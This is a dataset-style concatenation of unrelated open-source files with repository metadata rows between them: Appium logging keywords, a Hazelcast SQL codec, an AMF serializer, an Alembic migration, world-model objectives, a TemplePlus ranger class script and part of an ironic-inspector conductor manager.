times = [0.0, 1.0, None, 2.5, 2.55, 10.0, 10.1, 10.3, 10.5, 10.7, 10.8]
print("\nTest", times)
print(timing_analysis_dump(times))
print(timing_summary(times))
print(timing_analysis_dump([]))
raise SystemExit(1)
| mit | -3,456,444,688,188,179,500 | 34.247191 | 78 | 0.603762 | false |
jollychang/robotframework-appiumlibrary | AppiumLibrary/keywords/_logging.py | 1 | 1979 | # -*- coding: utf-8 -*-
import os
from robot.libraries.BuiltIn import BuiltIn
from robot.libraries.BuiltIn import RobotNotRunningError
from robot.api import logger
from .keywordgroup import KeywordGroup
class _LoggingKeywords(KeywordGroup):
LOG_LEVEL_DEBUG = ['DEBUG']
LOG_LEVEL_INFO = ['DEBUG', 'INFO']
LOG_LEVEL_WARN = ['DEBUG', 'INFO', 'WARN']
@property
def _log_level(self):
try:
level = BuiltIn().get_variable_value("${APPIUM_LOG_LEVEL}", default='DEBUG')
except RobotNotRunningError:
level = 'DEBUG'
return level
def _debug(self, message):
if self._log_level in self.LOG_LEVEL_DEBUG:
logger.debug(message)
def _info(self, message):
if self._log_level in self.LOG_LEVEL_INFO:
logger.info(message)
def _warn(self, message):
if self._log_level in self.LOG_LEVEL_WARN:
logger.warn(message)
def _html(self, message):
if self._log_level in self.LOG_LEVEL_INFO:
logger.info(message, True, False)
def _get_log_dir(self):
variables = BuiltIn().get_variables()
logfile = variables['${LOG FILE}']
if logfile != 'NONE':
return os.path.dirname(logfile)
return variables['${OUTPUTDIR}']
def _log(self, message, level='INFO'):
level = level.upper()
if (level == 'INFO'):
self._info(message)
elif (level == 'DEBUG'):
self._debug(message)
elif (level == 'WARN'):
self._warn(message)
elif (level == 'HTML'):
self._html(message)
def _log_list(self, items, what='item'):
msg = ['Altogether %d %s%s.' % (len(items), what, ['s', ''][len(items) == 1])]
for index, item in enumerate(items):
msg.append('%d: %s' % (index+1, item))
self._info('\n'.join(msg))
return items
| apache-2.0 | 3,333,785,420,948,168,700 | 29.412698 | 88 | 0.551794 | false |
hazelcast/hazelcast-python-client | hazelcast/protocol/codec/sql_execute_codec.py | 1 | 2438 | from hazelcast.serialization.bits import *
from hazelcast.protocol.builtin import FixSizedTypesCodec
from hazelcast.protocol.client_message import OutboundMessage, REQUEST_HEADER_SIZE, create_initial_buffer, RESPONSE_HEADER_SIZE
from hazelcast.protocol.builtin import StringCodec
from hazelcast.protocol.builtin import ListMultiFrameCodec
from hazelcast.protocol.builtin import DataCodec
from hazelcast.protocol.builtin import CodecUtil
from hazelcast.protocol.codec.custom.sql_query_id_codec import SqlQueryIdCodec
from hazelcast.protocol.codec.custom.sql_column_metadata_codec import SqlColumnMetadataCodec
from hazelcast.protocol.builtin import SqlPageCodec
from hazelcast.protocol.codec.custom.sql_error_codec import SqlErrorCodec
# hex: 0x210400
_REQUEST_MESSAGE_TYPE = 2163712
# hex: 0x210401
_RESPONSE_MESSAGE_TYPE = 2163713
_REQUEST_TIMEOUT_MILLIS_OFFSET = REQUEST_HEADER_SIZE
_REQUEST_CURSOR_BUFFER_SIZE_OFFSET = _REQUEST_TIMEOUT_MILLIS_OFFSET + LONG_SIZE_IN_BYTES
_REQUEST_EXPECTED_RESULT_TYPE_OFFSET = _REQUEST_CURSOR_BUFFER_SIZE_OFFSET + INT_SIZE_IN_BYTES
_REQUEST_INITIAL_FRAME_SIZE = _REQUEST_EXPECTED_RESULT_TYPE_OFFSET + BYTE_SIZE_IN_BYTES
_RESPONSE_UPDATE_COUNT_OFFSET = RESPONSE_HEADER_SIZE
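# The fixed-size request fields (timeout: long, cursor buffer size: int,
# expected result type: byte) are packed back to back after the standard
# request header, which is how the offsets above are derived; the
# variable-size fields (sql, parameters, schema, query id) follow as
# separate frames.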
def encode_request(sql, parameters, timeout_millis, cursor_buffer_size, schema, expected_result_type, query_id):
buf = create_initial_buffer(_REQUEST_INITIAL_FRAME_SIZE, _REQUEST_MESSAGE_TYPE)
FixSizedTypesCodec.encode_long(buf, _REQUEST_TIMEOUT_MILLIS_OFFSET, timeout_millis)
FixSizedTypesCodec.encode_int(buf, _REQUEST_CURSOR_BUFFER_SIZE_OFFSET, cursor_buffer_size)
FixSizedTypesCodec.encode_byte(buf, _REQUEST_EXPECTED_RESULT_TYPE_OFFSET, expected_result_type)
StringCodec.encode(buf, sql)
ListMultiFrameCodec.encode_contains_nullable(buf, parameters, DataCodec.encode)
CodecUtil.encode_nullable(buf, schema, StringCodec.encode)
SqlQueryIdCodec.encode(buf, query_id, True)
return OutboundMessage(buf, False)
def decode_response(msg):
initial_frame = msg.next_frame()
response = dict()
response["update_count"] = FixSizedTypesCodec.decode_long(initial_frame.buf, _RESPONSE_UPDATE_COUNT_OFFSET)
response["row_metadata"] = ListMultiFrameCodec.decode_nullable(msg, SqlColumnMetadataCodec.decode)
response["row_page"] = CodecUtil.decode_nullable(msg, SqlPageCodec.decode)
response["error"] = CodecUtil.decode_nullable(msg, SqlErrorCodec.decode)
return response
| apache-2.0 | 9,091,394,537,390,006,000 | 54.409091 | 127 | 0.800656 | false |
tailhook/amfy | amfy/core.py | 1 | 15667 | from io import BytesIO
import struct
import datetime, time
from collections import OrderedDict
from weakref import WeakKeyDictionary as weakdict
class Undefined(object):
__slots__ = ()
def __new__(cls):
return undefined
def __eq__(self, other):
return self is other
    def __ne__(self, other):
return self is not other
undefined = object().__new__(Undefined)
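# Calling object.__new__ through an instance bypasses Undefined.__new__ (which
# returns ``undefined`` and could not run before that name exists), so exactly
# one Undefined instance is created here; every later Undefined() call returns
# this singleton.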
class Loader(object):
def add_alias(self, alias, constructor):
raise NotImplementedError()
def load(self, stream, proto=0, context=None):
# please keep it reentrant
if context is None:
context = ReadContext()
if proto == 0:
return self._read_item0(stream, context)
elif proto == 3:
return self._read_item3(stream, context)
else:
raise ValueError(proto)
def loads(self, value, proto=0):
return self.load(BytesIO(value), proto)
def load_all(self, stream, proto=0):
context = Context()
try:
while True:
yield self.load(stream, proto, context)
except EOFError:
return
def loads_all(self, value, proto=0):
return self.load_all(BytesIO(value), proto)
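    # AMF3 values start with a one-byte type marker (0x00 undefined, 0x01
    # null, 0x02 false, 0x03 true, 0x04 integer, 0x05 double, 0x06 string,
    # 0x08 date, 0x09 array, 0x0A object, 0x0C byte array; the XML markers
    # 0x07 and 0x0B are not implemented).  Lengths and references use the
    # variable-length integers read by _read_vli below.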
def _read_item3(self, stream, context):
marker = stream.read(1)[0]
if marker == 0x00:
return undefined
elif marker == 0x01:
return None
elif marker == 0x02:
return False
elif marker == 0x03:
return True
elif marker == 0x04:
return self._read_vli(stream)
elif marker == 0x05:
return struct.unpack('!d', stream.read(8))[0]
elif marker == 0x06:
return self._read_string3(stream, context)
elif marker == 0x07:
raise NotImplementedError("XML Document")
elif marker == 0x08:
num = self._read_vli(stream)
if num & 1:
res = datetime.datetime.utcfromtimestamp(
struct.unpack('!d', stream.read(8))[0]/1000)
context.add_object(res)
else:
res = context.get_object(num >> 1)
return res
elif marker == 0x09:
num = self._read_vli(stream)
if num & 1:
res = None
while True:
val = self._read_string3(stream, context)
if val == '':
if res is None:
res = [None]*(num >> 1)
context.add_object(res)
break
elif res is None:
res = OrderedDict()
context.add_object(res)
res[val] = self._read_item3(stream, context)
for i in range(num >> 1):
res[i] = self._read_item3(stream, context)
else:
res = context.get_object(num >> 1)
return res
elif marker == 0x0A:
num = self._read_vli(stream)
if num & 1:
if num & 2:
if num & 4: # traits-ext
                        raise NotImplementedError('Traits ext')
else: # traits
dyn = bool(num & 8)
memb = num >> 4
trait = Trait(dyn,
self._read_string3(stream, context),
(self._read_string3(stream, context)
for i in range(memb)))
context.add_trait(trait)
else: # traits-ref
trait = context.get_trait(num >> 2)
else:
return context.get_object(num >> 1)
if trait.members:
raise NotImplementedError("Trait members")
if not trait.dynamic:
                raise NotImplementedError("Non-dynamic (sealed) traits")
res = {}
while True:
key = self._read_string3(stream, context)
if key == "":
break
value = self._read_item3(stream, context)
res[key] = value
return res
elif marker == 0x0B:
# xml
raise NotImplementedError()
elif marker == 0x0C:
num = self._read_vli(stream)
if num & 1:
res = stream.read(num >> 1)
context.add_object(res)
else:
res = context.get_object(num >> 1)
return res
else:
raise NotImplementedError("Marker 0x{:02x}".format(marker))
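    # Variable-length unsigned integer: each byte contributes its low 7 bits,
    # and a set most-significant bit means another byte follows.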
def _read_vli(self, stream):
val = 0
while True:
byte = stream.read(1)[0]
val = (val << 7) | (byte & 0x7f)
if not (byte & 0x80):
break
return val
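    # AMF3 string: the low bit of the length word selects inline UTF-8 data
    # (added to the per-message reference table unless empty) versus an index
    # into strings already seen.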
def _read_string3(self, stream, context):
num = self._read_vli(stream)
if num & 1:
num >>= 1
if num:
res = stream.read(num).decode('utf-8')
context.add_string(res)
return res
else:
return ''
else:
num >>= 1
return context.get_string(num)
def _read_string0(self, stream):
len = struct.unpack('!H', stream.read(2))[0]
return stream.read(len).decode('utf-8')
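    # AMF0 values also start with a one-byte marker (0x00 number, 0x01
    # boolean, 0x02 string, 0x03 object, 0x05 null, 0x06 undefined, 0x07
    # reference, 0x08 ECMA array, 0x0A strict array, 0x0B date, 0x0C long
    # string, 0x11 switch to AMF3).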
def _read_item0(self, stream, context):
marker = stream.read(1)
if marker:
marker = marker[0]
else:
raise EOFError()
if marker == 0x00:
return struct.unpack('!d', stream.read(8))[0]
elif marker == 0x01:
return bool(stream.read(1)[0])
elif marker == 0x02:
return self._read_string0(stream)
elif marker == 0x03:
res = {}
context.add_complex(res)
while True:
key = self._read_string0(stream)
if key == '':
break
res[key] = self._read_item0(stream, context)
end = stream.read(1)[0]
assert end == 0x09
return res
elif marker == 0x05: # null
return None
elif marker == 0x06: # undefined
return undefined
elif marker == 0x07: # ref
idx = struct.unpack('!H', stream.read(2))[0]
return context.get_complex(idx)
elif marker == 0x08: # assoc arr
cnt = struct.unpack('!L', stream.read(4))[0]
res = {}
context.add_complex(res)
for i in range(cnt):
key = self._read_string0(stream)
res[key] = self._read_item0(stream, context)
return res
elif marker == 0x0A: # strict array
cnt = struct.unpack('!L', stream.read(4))[0]
res = []
context.add_complex(res)
for i in range(cnt):
res.append(self._read_item0(stream, context))
return res
elif marker == 0x0B: # date
val = struct.unpack('!d', stream.read(8))[0]
res = datetime.datetime.utcfromtimestamp(val/1000)
tz = stream.read(2)
assert tz == b'\x00\x00'
return res
elif marker == 0x0C: # longstring
len = struct.unpack('!L', stream.read(4))[0]
return stream.read(len).decode('utf-8')
elif marker == 0x11: # AVM+
return self._read_item3(stream, context)
else:
raise NotImplementedError("Marker {:02x}".format(marker))
class Trait(object):
__slots__ = ('dynamic', 'classname', 'members')
def __init__(self, dynamic, classname, members=()):
self.dynamic = dynamic
self.members = tuple(members)
self.classname = classname
anonymous_trait = Trait(True, "")
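# An AMF3 object is described by a "trait" (class name, sealed member names,
# dynamic flag).  Plain dicts are written with this anonymous, fully dynamic
# trait, and the reader above only supports such dynamic, member-less traits.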
class Dumper(object):
def dump(self, data, stream=None, proto=None, context=None):
# please keep it reentrant
if context is None:
context = WriteContext()
if proto == 0:
return self._write_item0(data, stream, context)
elif proto == 3:
return self._write_item3(data, stream, context)
else:
raise ValueError(proto)
def _write_item0(self, data, stream, context):
if isinstance(data, bool):
stream.write(b'\x01\x01' if data else b'\x01\x00')
elif isinstance(data, (float, int)):
stream.write(b'\x00' + struct.pack('!d', data))
elif isinstance(data, str):
if len(data) < 65536:
stream.write(b'\x02')
self._write_string0(data, stream, context)
else:
data = data.encode('utf-8')
stream.write(b'\x0c' + struct.pack('!L', len(data)))
stream.write(data)
elif isinstance(data, dict):
ref = context.get_complex(data)
if ref is not None:
stream.write(b'\x07' + struct.pack('!H', ref))
else:
context.add_complex(data)
stream.write(b'\x03')
for k, v in data.items():
self._write_string0(k, stream, context)
self._write_item0(v, stream, context)
self._write_string0("", stream, context)
stream.write(b'\x09')
elif data is None: # null
stream.write(b'\x05')
elif data is undefined: # undefined
stream.write(b'\x06')
elif isinstance(data, (list, tuple)): # strict array
ref = context.get_complex(data)
if ref is not None:
stream.write(b'\x07' + struct.pack('!H', ref))
else:
context.add_complex(data)
stream.write(b'\x0A' + struct.pack('!L', len(data)))
for i in data:
self._write_item0(i, stream, context)
elif isinstance(data, datetime.datetime):
stream.write(b'\x0b' + struct.pack('!d',
time.mktime(data.utctimetuple())*1000) + b'\x00\x00')
else:
raise NotImplementedError("Type {!r}".format(type(data)))
def _write_string0(self, data, stream, context):
data = data.encode('utf-8')
stream.write(struct.pack('!H', len(data)))
stream.write(data)
def _write_item3(self, data, stream, context):
if data is undefined:
stream.write(b'\x00')
elif data is None:
stream.write(b'\x01')
elif data is False:
stream.write(b'\x02')
elif data is True:
stream.write(b'\x03')
elif isinstance(data, int) and data >= 0 and data < (1 << 31):
stream.write(b'\x04')
self._write_vli(data, stream)
elif isinstance(data, (int, float)):
stream.write(b'\x05' + struct.pack('!d', data))
elif isinstance(data, str):
stream.write(b'\x06')
self._write_string3(data, stream, context)
elif isinstance(data, datetime.datetime):
stream.write(b'\x08')
ref = context.get_object(data)
if ref is not None:
self._write_vli((ref << 1), stream)
else:
self._write_vli(1, stream)
stream.write(struct.pack('!d',
time.mktime(data.utctimetuple())*1000))
context.add_object(data)
elif isinstance(data, dict):
stream.write(b'\x0A')
ref = context.get_object(data)
if ref is not None:
self._write_vli((ref << 1), stream)
else:
ref = context.get_trait(anonymous_trait)
if ref is not None:
self._write_vli((ref << 2)|1, stream)
else:
context.add_trait(anonymous_trait)
self._write_vli(11, stream)
self._write_string3(anonymous_trait.classname, stream, context)
for k, v in data.items():
self._write_string3(k, stream, context)
self._write_item3(v, stream, context)
self._write_string3("", stream, context)
elif isinstance(data, list):
stream.write(b'\x09')
ref = context.get_object(data)
if ref is not None:
self._write_vli((ref << 1), stream)
else:
context.add_object(data)
self._write_vli((len(data) << 1)|1, stream)
self._write_string3("", stream, context)
for i in data:
self._write_item3(i, stream, context)
elif isinstance(data, bytes):
stream.write(b'\x0C')
ref = context.get_object(data)
if ref is not None:
self._write_vli((ref << 1), stream)
else:
context.add_object(data)
self._write_vli((len(data) << 1)|1, stream)
stream.write(data)
else:
raise NotImplementedError("Type {!r}".format(type(data)))
def _write_vli(self, data, stream):
ba = bytearray()
if not data:
stream.write(b'\x00')
return
while data:
ba.append((data & 0x7f) | 0x80)
data >>= 7
ba.reverse()
ba[-1] &= 0x7f
stream.write(ba)
def _write_string3(self, data, stream, context):
ref = context.get_string(data)
if data and ref is not None:
self._write_vli(ref << 1, stream)
else:
if data:
context.add_string(data)
data = data.encode('utf-8')
self._write_vli((len(data) << 1)|1, stream)
stream.write(data)
class ReadContext(object):
def __init__(self):
self.strings = []
self.objects = []
self.traits = []
self.complex = []
def add_string(self, val):
self.strings.append(val)
def get_string(self, key):
return self.strings[key]
def add_object(self, val):
self.objects.append(val)
def get_object(self, key):
return self.objects[key]
def add_trait(self, val):
self.traits.append(val)
def get_trait(self, key):
return self.traits[key]
def add_complex(self, val):
self.complex.append(val)
def get_complex(self, key):
return self.complex[key]
class WriteContext(object):
def __init__(self):
self.strings = {}
self.nstrings = 0
self.objects = {}
self.nobjects = 0
self.traits = {}
self.ntraits = 0
self.complex = {}
self.ncomplex = 0
def add_string(self, val):
self.strings[val] = self.nstrings
self.nstrings += 1
def get_string(self, key):
return self.strings.get(key, None)
def add_object(self, val):
self.objects[id(val)] = self.nobjects
self.nobjects += 1
def get_object(self, key):
return self.objects.get(id(key), None)
def add_trait(self, val):
self.traits[val] = self.ntraits
self.ntraits += 1
def get_trait(self, key):
return self.traits.get(key, None)
def add_complex(self, val):
self.complex[id(val)] = self.ncomplex
self.ncomplex += 1
def get_complex(self, key):
return self.complex.get(id(key), None)
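# --- Illustrative usage (not part of the original module) --------------------
# Minimal AMF3 round trip through the Dumper and Loader defined above; it only
# runs when this file is executed directly.
if __name__ == '__main__':
    _payload = {'name': 'amfy', 'values': [1, 2.5, True, None]}
    _buf = BytesIO()
    Dumper().dump(_payload, _buf, proto=3)
    _buf.seek(0)
    print(Loader().load(_buf, proto=3))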
| mit | 762,591,521,325,786,100 | 32.911255 | 83 | 0.495117 | false |
EnvGen/BARM_web_server | migrations/versions/15045c53040_.py | 1 | 4868 | """empty message
Revision ID: 15045c53040
Revises: 80bab4f8ff
Create Date: 2016-01-07 10:21:05.812275
"""
# revision identifiers, used by Alembic.
revision = '15045c53040'
down_revision = '80bab4f8ff'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('annotation',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('annotation_type', sa.String(), nullable=True),
sa.Column('type_identifier', sa.String(), nullable=False),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('annotation_type', 'type_identifier', name='annotation_unique')
)
op.create_table('annotation_source',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('dbname', sa.String(), nullable=True),
sa.Column('dbversion', sa.String(), nullable=True),
sa.Column('algorithm', sa.String(), nullable=True),
sa.Column('algorithm_parameters', sa.String(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('reference_assembly',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('cog',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('category', sa.String(), nullable=True),
sa.ForeignKeyConstraint(['id'], ['annotation.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('ecnumber',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('first_digit', sa.Integer(), nullable=True),
sa.Column('second_digit', sa.Integer(), nullable=True),
sa.Column('third_digit', sa.Integer(), nullable=True),
sa.Column('fourth_digit', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['id'], ['annotation.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_ecnumber_first_digit'), 'ecnumber', ['first_digit'], unique=False)
op.create_index(op.f('ix_ecnumber_fourth_digit'), 'ecnumber', ['fourth_digit'], unique=False)
op.create_index(op.f('ix_ecnumber_second_digit'), 'ecnumber', ['second_digit'], unique=False)
op.create_index(op.f('ix_ecnumber_third_digit'), 'ecnumber', ['third_digit'], unique=False)
op.create_table('gene',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(), nullable=True),
sa.Column('reference_assemlby_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['reference_assemlby_id'], ['reference_assembly.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('pfam',
sa.Column('id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['id'], ['annotation.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('tigrfam',
sa.Column('id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['id'], ['annotation.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('gene_annotation',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('annotation_id', sa.Integer(), nullable=True),
sa.Column('gene_id', sa.Integer(), nullable=True),
sa.Column('e_value', sa.Float(), nullable=True),
sa.Column('annotation_source_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['annotation_id'], ['annotation.id'], ),
sa.ForeignKeyConstraint(['annotation_source_id'], ['annotation_source.id'], ),
sa.ForeignKeyConstraint(['gene_id'], ['gene.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('gene_id', 'annotation_id', 'annotation_source_id', name='gene_annotation_unique')
)
op.create_table('gene_count',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('sample_id', sa.Integer(), nullable=False),
sa.Column('gene_id', sa.Integer(), nullable=False),
sa.Column('rpkm', sa.Float(), nullable=True),
sa.ForeignKeyConstraint(['gene_id'], ['gene.id'], ),
sa.ForeignKeyConstraint(['sample_id'], ['sample.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('sample_id', 'gene_id', name='genecount_unique')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('gene_count')
op.drop_table('gene_annotation')
op.drop_table('tigrfam')
op.drop_table('pfam')
op.drop_table('gene')
op.drop_index(op.f('ix_ecnumber_third_digit'), table_name='ecnumber')
op.drop_index(op.f('ix_ecnumber_second_digit'), table_name='ecnumber')
op.drop_index(op.f('ix_ecnumber_fourth_digit'), table_name='ecnumber')
op.drop_index(op.f('ix_ecnumber_first_digit'), table_name='ecnumber')
op.drop_table('ecnumber')
op.drop_table('cog')
op.drop_table('reference_assembly')
op.drop_table('annotation_source')
op.drop_table('annotation')
### end Alembic commands ###
| gpl-2.0 | -2,371,235,589,855,736,000 | 40.965517 | 106 | 0.658381 | false |
google-research/world_models | objectives/objectives.py | 1 | 1961 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of objectives."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gin
import numpy as np
import tensorflow.compat.v1 as tf
from typing import Dict, Text
class Objective(object):
"""Base class for objectives."""
def __call__(self, predictions: Dict[Text, np.ndarray]):
"""Calculates the reward from predictions.
Args:
predictions: a dictionary with possibly the following entries:
* "image": [batch, steps, height, width, channels] np array.
* "reward": [batch, steps, 1] np array.
Returns:
a [batch, 1] ndarray for the rewards.
"""
raise NotImplementedError
@gin.configurable
class RandomObjective(Objective):
"""A test objective that returns random rewards sampled from a normal dist."""
def __call__(self, predictions):
batch = predictions["image"].shape[0]
return np.random.normal(size=[batch, 1])
@gin.configurable
class DiscountedReward(Objective):
"""To be used with world model already predicting rewards."""
def __call__(self, predictions):
return np.sum(predictions["reward"], axis=1)
@gin.configurable
class TensorFlowDiscountedReward(Objective):
"""TensorFlow version of discounted reward."""
@tf.function
def __call__(self, predictions):
return tf.reduce_sum(predictions["reward"], axis=1)
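# Minimal usage sketch (assumed shapes, not part of the original module):
#
#   predictions = {"image": np.zeros([2, 5, 64, 64, 3]),
#                  "reward": np.ones([2, 5, 1])}
#   DiscountedReward()(predictions)  # -> np.ndarray of shape [2, 1], each entry 5.0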
| apache-2.0 | 5,443,015,263,609,577,000 | 28.712121 | 80 | 0.718001 | false |
GrognardsFromHell/TemplePlus | tpdatasrc/tpgamefiles/rules/char_class/class014_ranger.py | 1 | 2902 | from toee import *
import char_class_utils
import char_editor
###################################################
def GetConditionName(): # used by API
return "Ranger"
# def GetSpellCasterConditionName():
# return "Ranger Spellcasting"
def GetCategory():
return "Core 3.5 Ed Classes"
def GetClassDefinitionFlags():
return CDF_BaseClass | CDF_CoreClass
def GetClassHelpTopic():
return "TAG_RANGERS"
classEnum = stat_level_ranger
###################################################
class_feats = {
1: (feat_armor_proficiency_light, feat_shield_proficiency, feat_simple_weapon_proficiency, feat_martial_weapon_proficiency_all, feat_track),
4: (feat_animal_companion,),
9: (feat_evasion,)
}
class_skills = (skill_alchemy, skill_climb, skill_concentration, skill_craft, skill_handle_animal, skill_heal, skill_hide, skill_jump, skill_knowledge_nature, skill_listen, skill_move_silently, skill_profession, skill_ride, skill_search, skill_spot, skill_wilderness_lore, skill_swim, skill_use_rope)
spells_per_day = {
1: (-1,),
2: (-1,),
3: (-1,),
4: (-1,0),
5: (-1,0),
6: (-1,1),
7: (-1,1),
8: (-1,1, 0),
9: (-1,1, 0),
10: (-1,1, 1),
11: (-1,1, 1, 0),
12: (-1,1, 1, 1),
13: (-1,1, 1, 1),
14: (-1,2, 1, 1, 0),
15: (-1,2, 1, 1, 1),
16: (-1,2, 2, 1, 1),
17: (-1,2, 2, 2, 1),
18: (-1,3, 2, 2, 1),
19: (-1,3, 3, 3, 2),
20: (-1,3, 3, 3, 3)
#lvl 0 1 2 3 4 5 6 7 8 9
}
def GetHitDieType():
return 8
def GetSkillPtsPerLevel():
return 6
def GetBabProgression():
return base_attack_bonus_type_martial
def IsFortSaveFavored():
return 1
def IsRefSaveFavored():
return 1
def IsWillSaveFavored():
return 0
# Spell casting
def GetSpellListType():
return spell_list_type_ranger
def GetSpellSourceType():
return spell_source_type_divine
def GetSpellReadyingType():
return spell_readying_vancian
def GetSpellsPerDay():
return spells_per_day
caster_levels = [ int(x / 2) if x >= 4 else 0 for x in range(1, 21) ]
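# i.e. caster_levels == [0, 0, 0, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6, 7, 7, 8, 8, 9, 9, 10]
# (no caster level before class level 4; afterwards half the class level, rounded down)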
def GetCasterLevels():
return caster_levels
def GetSpellDeterminingStat():
return stat_wisdom
def IsClassSkill(skillEnum):
return char_class_utils.IsClassSkill(class_skills, skillEnum)
def IsClassFeat(featEnum):
return char_class_utils.IsClassFeat(class_feats, featEnum)
def GetClassFeats():
return class_feats
def IsAlignmentCompatible( alignment):
return 1
def ObjMeetsPrereqs( obj ):
return 1
def IsSelectingFeaturesOnLevelup( obj ):
newLvl = obj.stat_level_get( classEnum ) + 1
if newLvl == 1 or newLvl == 2 or (newLvl % 5) == 0:
return 1
return 0
def LevelupSpellsFinalize( obj, classLvlNew = -1 ):
classLvl = obj.stat_level_get(classEnum)
classLvlNew = classLvl + 1
if classLvlNew < 4: # late-starting caster
return 0
maxSpellLvl = char_editor.get_max_spell_level( obj, classEnum, classLvlNew )
class_spells = char_editor.get_learnable_spells(obj, classEnum, maxSpellLvl)
char_editor.spell_known_add(class_spells)
	return 0
| mit | 5,280,413,577,871,603,000 | 21.858268 | 300 | 0.671606 | false |
openstack/ironic-inspector | ironic_inspector/conductor/manager.py | 1 | 8755 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import traceback as traceback_mod
from eventlet import semaphore
from futurist import periodics
from ironic_lib import mdns
from oslo_config import cfg
from oslo_log import log
import oslo_messaging as messaging
from oslo_utils import excutils
from oslo_utils import reflection
import tooz
from ironic_inspector.common import coordination
from ironic_inspector.common.i18n import _
from ironic_inspector.common import ironic as ir_utils
from ironic_inspector.common import keystone
from ironic_inspector import db
from ironic_inspector import introspect
from ironic_inspector import node_cache
from ironic_inspector.plugins import base as plugins_base
from ironic_inspector import process
from ironic_inspector.pxe_filter import base as pxe_filter
from ironic_inspector import utils
LOG = log.getLogger(__name__)
CONF = cfg.CONF
MANAGER_TOPIC = 'ironic_inspector.conductor'
class ConductorManager(object):
"""ironic inspector conductor manager"""
RPC_API_VERSION = '1.3'
target = messaging.Target(version=RPC_API_VERSION)
def __init__(self):
self._periodics_worker = None
self._zeroconf = None
self._shutting_down = semaphore.Semaphore()
self.coordinator = None
def init_host(self):
"""Initialize Worker host
        Initialize the db connection, load and validate processing
        hooks, and run periodic tasks.
        :returns: None
"""
if CONF.processing.store_data == 'none':
LOG.warning('Introspection data will not be stored. Change '
'"[processing] store_data" option if this is not '
'the desired behavior')
else:
LOG.info('Introspection data will be stored in the %s backend',
CONF.processing.store_data)
db.init()
self.coordinator = None
try:
self.coordinator = coordination.get_coordinator(prefix='conductor')
self.coordinator.start(heartbeat=True)
self.coordinator.join_group()
except Exception as exc:
if CONF.standalone:
LOG.info('Coordination backend cannot be started, assuming '
'no other instances are running. Error: %s', exc)
self.coordinator = None
else:
with excutils.save_and_reraise_exception():
LOG.critical('Failure when connecting to coordination '
'backend', exc_info=True)
self.del_host()
else:
LOG.info('Successfully connected to coordination backend.')
try:
hooks = plugins_base.validate_processing_hooks()
except Exception as exc:
LOG.critical(str(exc))
sys.exit(1)
LOG.info('Enabled processing hooks: %s', [h.name for h in hooks])
driver = pxe_filter.driver()
driver.init_filter()
periodic_clean_up_ = periodics.periodic(
spacing=CONF.clean_up_period,
enabled=(CONF.clean_up_period != 0)
)(periodic_clean_up)
sync_with_ironic_ = periodics.periodic(
spacing=CONF.clean_up_period,
enabled=(CONF.clean_up_period != 0)
)(sync_with_ironic)
callables = [(periodic_clean_up_, None, None),
(sync_with_ironic_, (self,), None)]
driver_task = driver.get_periodic_sync_task()
if driver_task is not None:
callables.append((driver_task, None, None))
# run elections periodically if we have a coordinator
# that we were able to start
if (self.coordinator and self.coordinator.started):
periodic_leader_election_ = periodics.periodic(
spacing=CONF.leader_election_interval
)(periodic_leader_election)
callables.append((periodic_leader_election_, (self,), None))
self._periodics_worker = periodics.PeriodicWorker(
callables=callables,
executor_factory=periodics.ExistingExecutor(utils.executor()),
on_failure=self._periodics_watchdog)
utils.executor().submit(self._periodics_worker.start)
if CONF.enable_mdns:
endpoint = keystone.get_endpoint('service_catalog')
self._zeroconf = mdns.Zeroconf()
self._zeroconf.register_service('baremetal-introspection',
endpoint)
def del_host(self):
"""Shutdown the ironic inspector conductor service."""
if self.coordinator is not None:
try:
if self.coordinator.started:
self.coordinator.leave_group()
self.coordinator.stop()
except tooz.ToozError:
LOG.exception('Failed to stop coordinator')
if not self._shutting_down.acquire(blocking=False):
LOG.warning('Attempted to shut down while already shutting down')
return
pxe_filter.driver().tear_down_filter()
if self._periodics_worker is not None:
try:
self._periodics_worker.stop()
self._periodics_worker.wait()
except Exception as e:
LOG.exception('Service error occurred when stopping '
'periodic workers. Error: %s', e)
self._periodics_worker = None
if utils.executor().alive:
utils.executor().shutdown(wait=True)
if self._zeroconf is not None:
self._zeroconf.close()
